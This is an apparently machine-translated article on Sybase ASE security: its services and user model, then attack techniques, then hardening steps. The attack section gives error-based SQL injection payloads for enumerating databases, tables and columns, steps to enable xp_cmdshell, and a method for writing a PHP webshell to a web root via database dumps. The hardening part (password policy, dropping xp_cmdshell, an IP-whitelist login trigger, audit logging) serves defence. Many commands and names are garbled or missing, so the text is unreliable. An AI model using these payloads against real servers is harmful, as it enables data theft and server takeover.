Sybase Database Security

Sybase Database Security

Introduction
The full name of Sybase is SAP Sybase Adaptive Server Enterprise (ASE or Sybase ASE for short). It inherits the original MSSQL Code and is closely related to MSSQL. Sybase is a relational database system. It is a large database system in a typical UNIX or WindowsNT client/server environment. It uses PowerBuilder as the development tool and SAP Sybase SQL Anywhere as the client. Currently, the new version is ASE 15.7.x, which is named from 12.5.5 directly to 15.0.0 (skip 13 and 14 in the middle). In this test, 12.5.2 is used, where 12.5 is the most stable version in the 12 major versions.

Note the following when creating a database:

Service and Port

Open Port:
Backup Service: 5001, Monitoring Service: 5002, master database service: 5000, stored procedure service: 5004
Default Database

Master: the core database of the system. It controls server operations and stores information about all user databases and related storage devices, including the user name and password;
Model: Template database. When creating a user database, the system creates a copy based on the model database and expands the database size to the size specified by the user.
Systemprocs: stores the stored procedures of the system.
Sybsystemdb: about Distributed Transaction Management.
Tempdb: contains temporary tables for storing temporary data.
Registered users and database users
After SQL server creates a registered user, the user can be legally added to SQL SERVER. The registered user information is stored in the syslogins table of the master database. However, only when a registered user becomes a database user and has certain permissions granted to the user can the user use the tables in the database under restrictions.
Create a registered user:
Sp_addlogin loginame, passwd (delete is drop)
Create a database user:
[Dbname ..] sp_adduser loginame (the loginame here must be a registered user; otherwise, an error is returned)
Assign permissions:
Grant all | select, insert, delete, update
On table_name | view_name | stored_procedure_name
To username
Or
Grant all | create database, create
Default, create procedure, create rule, create table, create view, set proxy, set session authorization
To username
Database user category
Sa users, database owners, database object owners, and common database users
1) sa User: system user with all permissions.
2) database owner: database owner (dbo) users can operate all objects (such as tables, views, and stored procedures) in the database.
3) database object owner: in actual management, it is generally the database owner.
4) common database users: similar to public, common database users must grant certain permissions to certain objects (such as tables, views, and processes) in the database owner to the database, to allow operations on certain objects in the database.
Alias (aliases) and group (group)
1) alias: the alias (aliases) indicates that the registered user in SQL SERVER accesses the database as the same database user and has the same permissions as the user.
2) A group is a collection of database users. That is, the group permission is used to control the database users in the group, however, you can also perform extra permission control on some database users in the group.

Role
Generally, sa users are divided into three roles in a database system with a relatively small Management Division: the system administrator role (SA role) and the system security officer role (SSO role) operator role ).

Connection and management tools
1) isql
Mysql.exe located in the mysqldata library. Can connect to local and network databases. Use isql-U sa-P "" To Connect:

All parameters must be case sensitive:
-? Displays the syntax Summary of the isql switch.
-L lists the names of the Servers configured locally and the servers broadcast on the network.
-U login_id: User Logon ID. The logon ID is case sensitive.
-P password is the password specified by the user. If the-P option is not used, isql prompts you to enter the password. If the-P option is used at the end of the command prompt without a password, isql uses the default password NULL ). The password is case sensitive.
-S server_name specifies the default instance of SQL Server to be connected. If no Server is specified, isql connects to the default instance of SQL Server on the local computer. This option is required if you want to execute isql from a remote computer on the network.
-H hostname is the host name of the client used.
-D use database name, used to specify the database name
2) official Sybase SQL advantages
Disadvantage: a. It is released along with the complete database installation package and has version requirements when used.
B. Only SQL statements are supported. I personally think it is the graphical version of isql, which is inconvenient.

(SQL. ini settings and features: http://blog.csdn.net/potato015/Article/details/2450989)
3) Sybase Central
Disadvantage: a. It is released along with the complete database installation package and has version requirements when used.
B. Not very powerful

4) DBArtisan

0x01 Sybase Security
Execute system commands
Xp_cmdshell is disabled by default. When xp_cmdshell is not enabled:

Enable xp_cmdshell: sp_configure 'xp _ cmdshell context', 0

After xp_cmdshell is enabled, run the following command:

Execute xp_cmdshell if the permission is insufficient:

Details:
1. Execute sp_configure 'xp _ Role shell'. 0 allows all login users with the sa_role role to execute the xp_role shell command. This function is disabled by default.
2. sp_configure 'xp _ login shell' by default. 1. After testing, the user must have the same longin user name and password in windows, and the user belongs to the administrators permission group. The following points cannot be ignored: deselect "Change Password Upon next login "!
3. Because MSSQL is integrated with windows, you can directly log on to the database using the system account. Sybase needs to be configured in the second step to achieve the same effect as MSSQL.
Comments and joint Query
Union is supported. comments can be made with // and --. spaces can be replaced with //, spaces can be replaced with +, and count () is supported (), however, wildcards cannot appear in subqueries.

12.5.2 and earlier versions do not support the TOP keyword. If the select top N from injection statement is used, an error is returned.

Of course, there must be an alternative to top, that is, set rowcount N.


However, set rowcount N does not seem to support subqueries and condition clauses:

Multi-sentence execution
Unlike mssql, multiple statements are separated by spaces instead of semicolons.


Encoding support
Same as MSSQL:

SQL Injection features
Use Php as the script:

Use Java as the script:

Determine whether the database is Sybase:
Id = 1 and exists (select * from master. dbo. ijdbc_function_escapes)


Note that sybase does not support direct comparison of different types of data (different from MSSQL) when injecting data in error reporting mode ):
Id = 1 and 1 = user
Id = 1 and 1 = convert (integer, user)
! [Enter image description here] [28]
Id = 1 and 1 = convert (integer, (select + @ version ))
! [Enter image description here] [29]

 

Id =-1 union select 1, "", (select @ version)

Column Library (complex version ):
Id = 1 and 1 = convert (integer, (select min (ISNULL (CONVERT (NVARCHAR (4000), gJyQ. name), CHAR (32) FROM (SELECT name FROM master .. sysdatabases) AS gJyQ where convert (NVARCHAR (4000), gJyQ. name)> ''))
List the first master database
Id = 1 and 1 = convert (integer, (select min (ISNULL (CONVERT (NVARCHAR (4000), gJyQ. name), CHAR (32) FROM (SELECT name FROM master .. sysdatabases) AS gJyQ where convert (NVARCHAR (4000), gJyQ. name)> 'master '))
List the first database except the master database

Column Library (simple version ):
Id = 1 and 1 = convert (integer, (SELECT name FROM master .. sysdatabases where dbid = 1) continuously increment the value of dbid

Dbid is a continuous number, which is easy to guess.

PS: Although Sybase cannot use TOP or for xml path, it supports having, where not in, and other syntaxes.
Different from MSSQL:
MSSQL is xtype Sybase is type

List (complex version only ):
Id = 1 and 1 = convert (integer, (select MIN (ISNULL (CONVERT (NVARCHAR (4000), aaaa. name), CHAR (32) from (select name from test. dbo. sysobjects where type = 'U') AS aaaa where CONVERT (NVARCHAR (4000), aaaa. name)> ''))
List the first table cmd
Id = 1 and 1 = convert (integer, (select MIN (ISNULL (CONVERT (NVARCHAR (4000), aaaa. name), CHAR (32) from (select name from test. dbo. sysobjects where type = 'U') AS aaaa where CONVERT (NVARCHAR (4000), aaaa. name)> 'cmd '))
List the first table except cmd; Limit 0

Column field:
Select name from test .. syscolumns where id = object_id ('users') and colid = 1 increment colid
That is:
Id = 1 and 1 = convert (integer, (select name from test .. syscolumns where id = object_id ('users') and colid = 1 ))

Tool injection:

Pangolin cannot guess the database name, capture the packet and find that the TOP keyword is used. It seems that pangolin only supports sybase after 12.5.3

Backup Write File (webshell)
Prerequisites:
1. Open the backup service
2. the backup service allows remote access
3. Database permission (host permission) + disk write permission
Steps:
1. create table cmd (a image )-
2. insert into cmd (a) values ('')-
3. dump database test to 'C: \ wamp \ www \ 1. php' [full backup]
(Corresponding MSSQL: backup database name to disk = 'C: \ wamp \ www \ 1.php' with differential, FORMAT ;--)
Dump TRANSACTION test to 'C: \ wamp \ www \ 1. php' [LOG backup]
(MSSQL: backup log database name to disk = 'd: \ www \ xxx \ test. asp '--)
Note: When Using dump TRANSACTION, data files and log files must not be stored on the same device.
4. drop table cmd --

Reinforcement and Prevention
Password
Sp_password "original password", "new password", user name
For example, change the sa user's password from NULL to 123456: sp_password NULL, "123456", sa
Sp_configure "minimum password length", 8 --- minimum password length
Sp_configure "check password for digit", 1 --- contains at least one number
Sp_configure "systemwide password expiration", 90 --- password Validity Period
Sp_configure "maximum failed logins", 5 --- set the threshold for wrong password locking
Delete the Extended Stored Procedure xp_mongoshell and delete sybsyesp. dll.
Exec sp_dropextendedproc xp_cmdshell
Disable sa account usage:
Sp_locklogin sa, "lock"
Disable remote access:
Exec sp_configure "allow remote access", 0
After it is disabled, many services will not be available, such as backup

 

Login IP White List
The system does not have logon-related restrictions. You can only create a logon trigger to implement a logon IP whitelist.
Create procedure login_trg
As
Declare @ ip varchar (18), @ login_name varchar (20)
Begin
Select
@ Ip = t. ipaddr, @ login_name = suser_name ()
From master. dbo. sysprocesses t where t. spid = @ spid
If @ ip '192. 168.0.102'
Begin
Raiserror 30000 'IP address % 1! , With user % 2! Login failed! ', @ Ip, @ login_name
Select syb_quit ()
End
Else
Print 'Welcome! '
End
After creating a logon trigger, run the following command:
Isql> grant execute on login_trg to loginname
Isql> sp_modifylogin loginname, "login script", login_trg
 
Logs
Isql> exec sp_configure "log audit logon failure", 1 -- Record logon failure Information
Isql> exec sp_configure "log audit logon success", 1 -- Records logon success messages